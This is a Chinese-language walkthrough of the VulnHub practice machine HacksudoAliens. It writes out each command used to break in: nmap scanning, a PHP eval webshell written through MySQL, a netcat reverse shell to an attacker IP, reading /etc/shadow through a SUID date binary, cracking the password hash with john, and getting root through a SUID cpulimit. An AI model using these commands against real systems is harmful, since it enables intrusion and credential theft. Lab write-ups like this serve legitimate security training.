目录
靶机下载
下载链接:https://download.vulnhub.com/hacksudo/HacksudoAliens.zip
一、信息收集
先使用工具扫描靶机IP
arp-scan -l
接着扫描靶机开放端口
nmap -sS -sV -p- -T4 <ip>
这里发现了两个apache服务,分别访问看看
80端口:
9000端口:
可以看出9000端口是mysql后台登录框
尝试了一下弱密码,好像没有什么用
我们使用后台扫描工具
访问,可以发现有一个mysql的备份文件
下载下来,看看
这里有user,password,我们去9000端口尝试登录
二、数据库后台上传木马
登录进来,我们可以先看看数据库中有没有可以利用的信息
似乎没有,我们尝试写入一句话木马
SELECT '<?php @eval($_POST[1]);?>' INFO OUTFILE '/var/www/html/1.php';
接下来拿蚁剑连接,进入虚拟终端
三、反弹shell
接下来反弹shell到kali上
kali:nc -lvvp 4444
靶机:nc -e /bin/bash 192.168.15.129 4444
四、提权
1.date读取文件
看看/home,进入hacksudo,发现没有权限
查找s权限文件
find / -perm -u=s -type f 2>/dev/null
发现date,我们可以利用date越权操作,读取shadow文件
LFILE=/etc/shadow
date -f $LFILE
使用john爆破hacksudo的密码
echo 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::' > 123.txt
john 123.txt
2.cpulimit提权
我们使用ssh登录
在看看有哪些文件有s权限
有一个cpulimit,是一开始查s权限没有查到的
我们使用cpulimit提权
/home/hacksudo/Downloads/cpulimit -l 100 -f -- /bin/sh -p
提权成功!!!
总结
信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去玩玩!